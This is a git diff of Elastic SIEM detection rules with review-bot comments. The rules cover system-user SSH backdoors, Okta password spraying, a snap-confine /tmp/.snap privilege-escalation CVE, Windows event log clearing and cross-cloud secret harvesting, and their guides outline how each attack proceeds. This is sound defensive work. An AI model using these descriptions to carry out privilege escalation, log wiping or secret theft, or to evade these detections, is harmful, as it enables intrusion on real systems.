@@ -1,114 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies successful logins by system users that are uncommon to authenticate. These users have `nologin` set by default, and must be modified to allow SSH access. Adversaries may backdoor these users to gain unauthorized access to the system.", - "from": "now-9m", - "index": [ - "filebeat-*", - "logs-system.auth-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Login via Unusual System User", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Login via Unusual System User\n\nIn Linux environments, system users typically have restricted login capabilities to prevent unauthorized access. These accounts, often set with `nologin`, are not meant for interactive sessions. Adversaries may exploit these accounts by altering their configurations to enable SSH access, thus bypassing standard security measures. 
The detection rule identifies successful logins by these uncommon system users, flagging potential unauthorized access attempts for further investigation.\n\n### Possible investigation steps\n\n- Review the login event details to identify the specific system user account involved in the successful login, focusing on the user.name field.\n- Check the system logs for any recent changes to the user account's configuration, particularly modifications that might have enabled SSH access for accounts typically set with nologin.\n- Investigate the source IP address associated with the login event to determine if it is known or suspicious, and assess whether it aligns with expected access patterns.\n- Examine the timeline of events leading up to and following the login to identify any unusual activities or patterns that could indicate malicious behavior.\n- Verify if there are any other successful login attempts from the same source IP or involving other system user accounts, which could suggest a broader compromise.\n- Consult with system administrators to confirm whether any legitimate changes were made to the system user account's login capabilities and document any authorized modifications.\n\n### False positive analysis\n\n- System maintenance tasks may require temporary login access for system users. Verify if the login corresponds with scheduled maintenance and consider excluding these events during known maintenance windows.\n- Automated scripts or services might use system accounts for legitimate purposes. Identify these scripts and whitelist their associated activities to prevent false alerts.\n- Some system users might be configured for specific applications that require login capabilities. Review application requirements and exclude these users if their access is deemed necessary and secure.\n- In environments with custom configurations, certain system users might be intentionally modified for operational needs. 
Document these changes and adjust the detection rule to exclude these known modifications.\n- Regularly review and update the list of system users in the detection rule to ensure it reflects the current environment and operational requirements, minimizing unnecessary alerts.\n\n### Response and remediation\n\n- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the adversary.\n- Terminate any active sessions associated with the unusual system user accounts identified in the alert to disrupt ongoing unauthorized access.\n- Review and revert any unauthorized changes to the system user accounts, such as modifications to the shell configuration that enabled login capabilities.\n- Conduct a thorough audit of the system for any additional unauthorized changes or backdoors, focusing on SSH configurations and user account settings.\n- Reset passwords and update authentication mechanisms for all system user accounts to prevent further exploitation.\n- Implement additional monitoring and alerting for any future login attempts by system users, ensuring rapid detection and response to similar threats.\n- Escalate the incident to the security operations team for further investigation and to assess the potential impact on other systems within the network.", - "query": "authentication where host.os.type == \"linux\" and event.action in (\"ssh_login\", \"user_login\") and\nuser.name in (\n \"deamon\", \"bin\", \"sys\", \"games\", \"man\", \"lp\", \"mail\", \"news\", \"uucp\", \"proxy\", \"www-data\", \"backup\",\n \"list\", \"irc\", \"gnats\", \"nobody\", \"systemd-timesync\", \"systemd-network\", \"systemd-resolve\", \"messagebus\",\n \"avahi\", \"sshd\", \"dnsmasq\"\n) and event.outcome == \"success\"\n", - "references": [ - "https://blog.exatrack.com/Perfctl-using-portainer-and-new-persistences/", - "https://x.com/RFGroenewoud/status/1875112050218922010" - ], - "related_integrations": [ - { - "package": 
"system", - "version": "^1.64.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "428e9109-dc13-4ae9-84cb-100464d4c6fa", - "setup": "## Setup\n\nThis rule requires data coming in from Filebeat.\n\n### Filebeat Setup\nFilebeat is a lightweight shipper for forwarding and centralizing log data. Installed as an agent on your servers, Filebeat monitors the log files or locations that you specify, collects log events, and forwards them either to Elasticsearch or Logstash for indexing.\n\n#### The following steps should be executed in order to add the Filebeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setup-repositories.html).\n- To run Filebeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-docker.html).\n- To run Filebeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/running-on-kubernetes.html).\n- For quick start information for Filebeat refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/8.11/filebeat-installation-configuration.html).\n- For complete \u201cSetup and Run Filebeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/setting-up-and-running.html).\n\n#### Rule Specific Setup Note\n- This rule requires the \u201cFilebeat System Module\u201d to be enabled.\n- The system module 
collects and parses logs created by the system logging service of common Unix/Linux based distributions.\n- To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html).\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: System", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.004", - "name": "SSH Authorized Keys", - "reference": "https://attack.mitre.org/techniques/T1098/004/" - } - ] - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1564", - "name": "Hide Artifacts", - "reference": "https://attack.mitre.org/techniques/T1564/", - "subtechnique": [ - { - "id": "T1564.002", - "name": "Hidden Users", - "reference": "https://attack.mitre.org/techniques/T1564/002/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 3 - }, - "id": "428e9109-dc13-4ae9-84cb-100464d4c6fa_3", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_414.json b/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_414.json deleted file mode 100644 index 6c00f6fca6a..00000000000 
--- a/packages/security_detection_engine/kibana/security_rule/42bf698b-4738-445b-8231-c834ddefd8a0_414.json +++ /dev/null 
@@ -1,88 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies a high number of failed Okta user authentication attempts from a single IP address, which could be indicative of a brute force or password spraying attack. An adversary may attempt a brute force or password spraying attack to obtain unauthorized access to user accounts.", - "false_positives": [ - "Automated processes that attempt to authenticate using expired credentials and unbounded retries may lead to false positives." - ], - "index": [ - "filebeat-*", - "logs-okta*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Okta Brute Force or Password Spraying Attack", - "note": "## Triage and analysis\n\n### Investigating Okta Brute Force or Password Spraying Attack\n\nThis rule alerts when a high number of failed Okta user authentication attempts occur from a single IP address. This could be indicative of a brute force or password spraying attack, where an adversary may attempt to gain unauthorized access to user accounts by guessing the passwords.\n\n#### Possible investigation steps:\n\n- Review the `source.ip` field to identify the IP address from which the high volume of failed login attempts originated.\n- Look into the `event.outcome` field to verify that these are indeed failed authentication attempts.\n- Determine the `user.name` or `user.email` related to these failed login attempts. If the attempts are spread across multiple accounts, it might indicate a password spraying attack.\n- Check the timeline of the events. Are the failed attempts spread out evenly, or are there burst periods, which might indicate an automated tool?\n- Determine the geographical location of the source IP. Is this location consistent with the user's typical login location?\n- Analyze any previous successful logins from this IP. 
Was this IP previously associated with successful logins?\n\n### False positive analysis:\n\n- A single user or automated process that attempts to authenticate using expired or wrong credentials multiple times may trigger a false positive.\n- Analyze the behavior of the source IP. If the IP is associated with legitimate users or services, it may be a false positive.\n\n### Response and remediation:\n\n- If you identify unauthorized access attempts, consider blocking the source IP at the firewall level.\n- Notify the users who are targeted by the attack. Ask them to change their passwords and ensure they use unique, complex passwords.\n- Enhance monitoring on the affected user accounts for any suspicious activity.\n- If the attack is persistent, consider implementing CAPTCHA or account lockouts after a certain number of failed login attempts.\n- If the attack is persistent, consider implementing multi-factor authentication (MFA) for the affected user accounts.\n- Review and update your security policies based on the findings from the incident.", - "query": "event.dataset:okta.system and event.category:authentication and event.outcome:failure\n", - "references": [ - "https://developer.okta.com/docs/reference/api/system-log/", - "https://developer.okta.com/docs/reference/api/event-types/", - "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy", - "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security", - "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta" - ], - "related_integrations": [ - { - "package": "okta", - "version": "^3.5.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "42bf698b-4738-445b-8231-c834ddefd8a0", - "setup": "The Okta Fleet 
integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Use Case: Identity and Access Audit", - "Tactic: Credential Access", - "Data Source: Okta", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/" - } - ] - } - ], - "threshold": { - "field": [ - "source.ip" - ], - "value": 25 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 414 - }, - "id": "42bf698b-4738-445b-8231-c834ddefd8a0_414", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/44cb1d8a-1922-4fc0-a00f-36c1caf57393_1.json b/packages/security_detection_engine/kibana/security_rule/44cb1d8a-1922-4fc0-a00f-36c1caf57393_1.json new file mode 100644 index 00000000000..2a35be88a72 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/44cb1d8a-1922-4fc0-a00f-36c1caf57393_1.json 
@@ -0,0 +1,84 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects non-root file creation within \"/tmp/.snap\" or its host backing path \"/tmp/snap-private-tmp/*/tmp/.snap\", which may indicate exploitation attempts related to CVE-2026-3888. In vulnerable Ubuntu systems, the snap-confine utility normally creates the \"/tmp/.snap\" directory as root when initializing a snap sandbox. The vulnerability arises when systemd-tmpfiles deletes this directory after it becomes stale, allowing an unprivileged user to recreate it and populate attacker-controlled files. During subsequent snap sandbox initialization, snap-confine may bind-mount or trust these attacker-controlled paths, enabling manipulation of libraries or configuration files that can lead to local privilege escalation to root. Because legitimate creation of \".snap\" directories should only be performed by root, non-root file activity in these locations is highly suspicious. This detection helps identify early stages of the exploit before privilege escalation is completed.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential snap-confine Privilege Escalation via CVE-2026-3888", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Potential snap-confine Privilege Escalation via CVE-2026-3888\n\nThis rule flags non-root creation of files under temporary snap sandbox directories that snap-confine should prepare as root, which can expose an attempt to abuse CVE-2026-3888 for local root access. 
A common pattern is an unprivileged user waiting for stale `/tmp/.snap` content to be removed, recreating that path, and dropping crafted libraries or configuration so the next snap launch pulls attacker-controlled files into the sandbox setup and elevates privileges.\n\n### Possible investigation steps\n\n- Review the originating user's recent terminal, SSH, sudo, and scheduled-task activity to determine whether the file creation was part of legitimate administration or an unexpected local execution chain.\n- Inspect the affected `.snap` directory contents for crafted symlinks, shared libraries, configuration files, or path redirection artifacts that could be consumed during snap sandbox initialization.\n- Correlate the activity with nearby launches of `snap`, `snap-confine`, `snapd`, or installed snap applications and determine whether any such execution was followed by a new root-level process tree.\n- Look for evidence that `systemd-tmpfiles` or another cleanup mechanism removed the stale directory shortly before it was recreated by the unprivileged account, as this timing strongly supports CVE-2026-3888 exploitation behavior.\n- Examine post-alert host activity for signs of successful escalation such as unexpected root-owned file changes, new setuid binaries, persistence creation, credential access, or security control tampering.\n\n### False positive analysis\n\n- A user troubleshooting a failing snap application may manually create or modify files under `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap`; verify by reviewing the parent shell/process lineage and nearby `snap` or `snap-confine` executions to confirm it was interactive testing with no follow-on root activity.\n- Telemetry can occasionally attribute file creation to the invoking non-root user during normal snap sandbox initialization even though the privileged helper completes the action; verify by checking whether related `snap` or `snap-confine` events occurred at the same time and whether the 
final directory and files are owned by root.\n\n### Response and remediation\n\n- Isolate the affected Linux host from the network, stop any active `snap`, `snap-confine`, or suspicious root shell processes tied to the originating user, and preserve the contents of `/tmp/.snap` or `/tmp/snap-private-tmp/*/tmp/.snap` for evidence.\n- Remove attacker-controlled files, symlinks, shared libraries, and configuration placed in the recreated `.snap` paths, then delete any persistence added after the event such as unauthorized `systemd` units, `/etc/cron*` entries, `~/.ssh/authorized_keys` changes, sudoers modifications, new local accounts, or unexpected setuid-root binaries.\n- Escalate immediately to incident response and treat the host as fully compromised if you confirm a root-owned process tree descending from the unprivileged user, root-level file changes outside the temporary snap path, or tampering with `/etc/ld.so.preload`, PAM modules, or endpoint security agents.\n- Restore the host to a known-good state by rebuilding or reimaging it when privilege escalation cannot be conclusively ruled out, or otherwise replace modified system files from trusted packages, rotate credentials exposed on the system, and verify correct root ownership and permissions on snap temporary directories before reconnecting it.\n- Harden the environment by applying the vendor fix for CVE-2026-3888, updating `snapd` and related Ubuntu packages, restricting unnecessary local shell access, and increasing monitoring for non-root creation of files under `/tmp/.snap` and `/tmp/snap-private-tmp/*/tmp/.snap`.\n", + "query": "file where host.os.type == \"linux\" and event.action == \"creation\" and\nfile.path like (\"/tmp/.snap*\", \"/tmp/snap-private-tmp/*/tmp/.snap*\") and\nuser.id != \"0\"\n", + "references": [ + "https://blog.qualys.com/vulnerabilities-threat-research/2026/03/17/cve-2026-3888-important-snap-flaw-enables-local-privilege-escalation-to-root", + 
"https://cdn2.qualys.com/advisory/2026/03/17/snap-confine-systemd-tmpfiles.txt" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "44cb1d8a-1922-4fc0-a00f-36c1caf57393", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. 
[Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Use Case: Vulnerability", + "Tactic: Privilege Escalation", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "44cb1d8a-1922-4fc0-a00f-36c1caf57393_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_216.json b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_216.json new file mode 100644 index 00000000000..22241b8400a --- /dev/null 
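Review bot: The query is a `file where … event.action == "creation"` rule, but `index` names only `logs-endpoint.events.process*`, which in Elastic Defend's standard data-stream layout does not carry file events, so as written the rule appears unable to match anything. `required_fields` (`file.path`) and the investigation guide both describe file activity, and the deleted `3f4d7734…_4.json` earlier on this page uses the broader `logs-endpoint.events.*`, so this looks like a copy-over from a process rule rather than an intentional scope. Change it to `"logs-endpoint.events.file*"` and confirm against a sample `creation` event before release. Separately, `"/tmp/.snap*"` in the `file.path like (...)` clause also matches any `/tmp/.snap…`-prefixed name; if that proves noisy, `("/tmp/.snap", "/tmp/.snap/*")` keeps the directory-creation case the description relies on while dropping unrelated prefixes.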
+++ b/packages/security_detection_engine/kibana/security_rule/45ac4800-840f-414c-b221-53dd36a5aaf7_216.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic", + "Anabella Cristaldi" + ], + "description": "Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.security*", + "logs-system.system*", + "logs-windows.forwarded*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Windows Event Logs Cleared", + "note": "## Triage and analysis\n\n### Investigating Windows Event Logs Cleared\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the occurrence of clear actions on the `security` event log.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type:windows and event.action:(\"audit-log-cleared\" or \"Log clear\") and\n winlog.channel: (\"Security\" or \"System\")\n", + "related_integrations": [ + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.channel", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "45ac4800-840f-414c-b221-53dd36a5aaf7", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Windows Security Event Logs", + "Data Source: Windows System Event Logs" + ], + 
"threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 216 + }, + "id": "45ac4800-840f-414c-b221-53dd36a5aaf7_216", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json b/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json deleted file mode 100644 index e184c194971..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/472b4944-d810-43cf-83dc-7d080ae1b8dd_1.json +++ /dev/null 
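Review bot: The investigation guide in `note` still states that the rule "looks for the occurrence of clear actions on the `security` event log", while the query matches `winlog.channel: ("Security" or "System")` and both the index list and tags include the System log, so the guide understates what an analyst will be triaging. Update that sentence to `This rule looks for the occurrence of clear actions on the Security and System event logs.` It would also help triage to say in the investigation steps that a Security-channel clear (Event ID 1102) and a System-channel clear (Event ID 104) are distinct events with different audit sources, so the channel in the alert should guide which logs are reviewed.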
@@ -1,184 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule detects authenticated sessions accessing secret stores across multiple cloud providers from the same source address within a short period of time. Adversaries with access to compromised credentials or session tokens may attempt to retrieve secrets from services such as AWS Secrets Manager, Google Secret Manager, or Azure Key Vault in rapid succession to expand their access or exfiltrate sensitive information.", - "from": "now-9m", - "interval": "5m", - "language": "esql", - "license": "Elastic License v2", - "name": "Multiple Cloud Secrets Accessed by Source Address", - "note": "## Triage and analysis\n\n### Multiple Cloud Secrets Accessed by Source Address\n\nThis alert identifies a single source IP address accessing secret-management APIs across **multiple cloud providers**\n(e.g., AWS Secrets Manager, Google Secret Manager, Azure Key Vault) within a short timeframe.\nThis behavior is strongly associated with **credential theft, session hijacking, or token replay**, where an adversary\nuses stolen authenticated sessions to harvest secrets across cloud environments.\n\nUnexpected cross-cloud secret retrieval is uncommon and typically indicates automation misuse or malicious activity.\n\n### Possible investigation steps\n\n- Validate the principal\n - Identify the user, service account, workload identity, or application making the requests.\n - Confirm whether this identity is expected to operate across more than one cloud provider.\n- Review related activity\n - Look for additional alerts involving the same identity, source IP, or token over the last 24\u201348 hours.\n - Identify whether the source IP has been observed performing unusual authentication, privilege escalation,\n or reconnaissance.\n- Check application or service context\n - Determine whether any workload legitimately pulls secrets from multiple cloud providers.\n - Review deployment pipelines or 
integration layers that might legitimately bridge AWS, Azure, and GCP.\n- Analyze user agent and invocation patterns\n - Compare `user_agent.original` or equivalent fields against expected SDKs or automation tools.\n - Suspicious indicators include CLI tools, unknown libraries, browser user agents, or custom scripts.\n- Inspect IP reputation and origin\n - Determine whether the source IP corresponds to a managed workload (EC2, GCE, Azure VM) or an unexpected host.\n - Validate that the associated instance or host is under your control and behaving normally.\n- Review IAM permissions and accessed secrets\n - Check the policies attached to the identity.\n - Verify whether the accessed secrets are sensitive, unused, or unrelated to the identity\u2019s purpose.\n- Assess potential compromise scope\n - If compromise is suspected, enumerate other assets accessed by the same identity in the last 24 hours.\n - Look for lateral movement, privilege escalation, or abnormal API usage.\n\n### False positive analysis\n\n- Validate whether the source IP is associated with a legitimate multi-cloud orchestration tool, automation pipeline,\n or shared CI/CD system.\n- Confirm that the identity is authorized to access secrets across multiple cloud services.\n- If activity is expected, consider adding exceptions that pair account identity, source IP, and expected user agent\n to reduce noise.\n\n### Response and remediation\n\n- Initiate incident response** if the activity is unauthorized or suspicious.\n- Restrict or disable** the affected credentials or service accounts.\n- Rotate all accessed secrets** and review other secrets the identity can access.\n- Analyze systems** that may have leaked credentials, such as compromised hosts or exposed tokens.\n- Harden identity security:\n - Enforce MFA for users where applicable.\n - Reduce permissions to least privilege.\n - Review trust relationships, workload identities, and cross-cloud integrations.\n- Search for persistence 
mechanisms** such as newly created keys, roles, or service accounts.\n- Improve monitoring and audit visibility** by ensuring logging is enabled across all cloud environments.\n- Determine root cause** (phishing, malware, token replay, exposed credential, etc.) and close the vector to prevent recurrence.\n", - "query": "FROM logs-azure.platformlogs-*, logs-azure.activitylogs-*, logs-aws.cloudtrail-*, logs-gcp.audit-* METADATA _id, _version, _index\n| WHERE \n ( \n /* AWS Secrets Manager */ \n (event.dataset == \"aws.cloudtrail\" AND event.provider == \"secretsmanager.amazonaws.com\" AND event.action == \"GetSecretValue\") OR \n // Azure Key Vault (platform logs)\n (event.dataset == \"azure.platformlogs\" AND event.action IN (\"SecretGet\", \"KeyGet\")) or \n /* Azure Key Vault (activity logs) */ \n (event.dataset == \"azure.activitylogs\" AND azure.activitylogs.operation_name IN (\"MICROSOFT.KEYVAULT/VAULTS/SECRETS/LIST\", \"MICROSOFT.KEYVAULT/VAULTS/SECRETS/GET\")) OR \n /* Azure Managed HSM secret */ \n (event.dataset == \"azure.activitylogs\" AND azure.activitylogs.operation_name LIKE \"MICROSOFT.KEYVAULT/managedHSM/keys/*\") OR \n /* Google Secret Manager */ \n (event.dataset IN (\"googlecloud.audit\", \"gcp.audit\") AND \n event.action IN (\"google.cloud.secretmanager.v1.SecretManagerService.AccessSecretVersion\", \"google.cloud.secretmanager.v1.SecretManagerService.GetSecretRequest\"))\n ) AND source.ip IS NOT NULL\n// Unified user identity (raw)\n| EVAL Esql_priv.user_id =\n COALESCE(\n client.user.id,\n aws.cloudtrail.user_identity.arn,\n azure.platformlogs.identity.claim.upn,\n NULL\n )\n// Cloud vendor label based on dataset\n| EVAL Esql.cloud_vendor = CASE(\n event.dataset == \"aws.cloudtrail\", \"aws\",\n event.dataset IN (\"azure.platformlogs\",\"azure.activitylogs\"), \"azure\",\n event.dataset IN (\"googlecloud.audit\",\"gcp.audit\"), \"gcp\",\n \"unknown\"\n )\n// Vendor+tenant label, e.g. 
aws:123456789012, azure:tenant, gcp:project\n| EVAL Esql.tenant_label = CASE(\n Esql.cloud_vendor == \"aws\", CONCAT(\"aws:\", cloud.account.id),\n Esql.cloud_vendor == \"azure\", CONCAT(\"azure:\", cloud.account.id),\n Esql.cloud_vendor == \"gcp\", CONCAT(\"gcp:\", cloud.account.id),\n NULL\n )\n| STATS\n // Core counts\n Esql.events_count = COUNT(*),\n Esql.vendor_count_distinct = COUNT_DISTINCT(Esql.cloud_vendor),\n // Action & data source context\n Esql.event_action_values = VALUES(event.action),\n Esql.data_source_values = VALUES(event.dataset),\n // Cloud vendor + tenant context\n Esql.cloud_vendor_values = VALUES(Esql.cloud_vendor),\n Esql.tenant_label_values = VALUES(Esql.tenant_label),\n // Hyperscaler-specific IDs\n Esql.aws_account_id_values = VALUES(CASE(Esql.cloud_vendor == \"aws\", cloud.account.id, NULL)),\n Esql.azure_tenant_id_values = VALUES(CASE(Esql.cloud_vendor == \"azure\", cloud.account.id, NULL)),\n Esql.gcp_project_id_values = VALUES(CASE(Esql.cloud_vendor == \"gcp\", cloud.account.id, NULL)),\n // Generic cloud metadata\n Esql.cloud_region_values = VALUES(cloud.region),\n Esql.cloud_service_name_values = VALUES(cloud.service.name),\n // Identity (privileged)\n Esql_priv.user_values = VALUES(Esql_priv.user_id),\n Esql_priv.client_user_id_values = VALUES(client.user.id),\n Esql_priv.aws_user_identity_arn_values = VALUES(aws.cloudtrail.user_identity.arn),\n Esql_priv.azure_upn_values = VALUES(azure.platformlogs.identity.claim.upn),\n // Namespace values\n Esql.data_stream_namespace_values = VALUES(data_stream.namespace)\n BY source.ip\n// Require multi-vendor cred-access from same source IP\n| WHERE Esql.vendor_count_distinct >= 2\n| SORT Esql.events_count DESC\n| KEEP Esql.*, Esql_priv.*, source.ip\n", - "references": [ - "https://docs.aws.amazon.com/secretsmanager/latest/apireference/API_GetSecretValue.html", - "https://docs.cloud.google.com/secret-manager/docs/samples/secretmanager-access-secret-version", - 
